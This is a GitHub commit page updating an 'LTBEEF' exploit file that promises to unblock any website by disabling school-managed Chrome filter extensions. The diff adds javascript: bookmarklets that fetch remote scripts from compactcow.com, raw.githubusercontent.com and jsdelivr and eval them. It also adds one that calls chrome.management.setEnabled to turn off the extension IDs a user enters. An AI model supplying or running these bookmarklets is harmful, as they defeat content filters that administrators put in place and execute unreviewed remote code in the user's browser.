Skip to content

Commit

Permalink
Update LTBEEF
Browse files Browse the repository at this point in the history
  • Loading branch information
S-PScripts authored May 26, 2024
1 parent 44a08fb commit 2132c2e
Showing 1 changed file with 13 additions and 0 deletions.
13 changes: 13 additions & 0 deletions Exploits/LTBEEF
Original file line number Diff line number Diff line change
Expand Up @@ -11,6 +11,12 @@ This is LTBEEF, an exploit to unblock ANY website! Note that this has been patch
CompactCow GUI:
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});

javascript: fetch("https://compactcow.com/ltbeef/exploit.js").then((data) => {
data.text().then((text) => {
eval(text);
});
});

CompactCow GUI (Dark):
javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);

Expand All @@ -20,6 +26,13 @@ javascript:(function () {var a = document.createElement('script');a.src = 'https
Ingot for IBoss:
javascript:%28async%20function%28%29%7Beval%28await%28await%20fetch%28%22https%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2FSpaceSaver%2FIngot-for-iBoss%40latest%2Fingot.js%22%29%29.text%28%29%29%7D%29%28%29%3B

Basic (no GUI):
javascript: prompt("Extension IDs here: (seperated by commas)")
.split(",")
.forEach((i) => {
chrome.management.setEnabled(i.trim(), !1);
});

Credits:
Bypassi
3kh0
Expand Down

0 comments on commit 2132c2e

Please sign in to comment.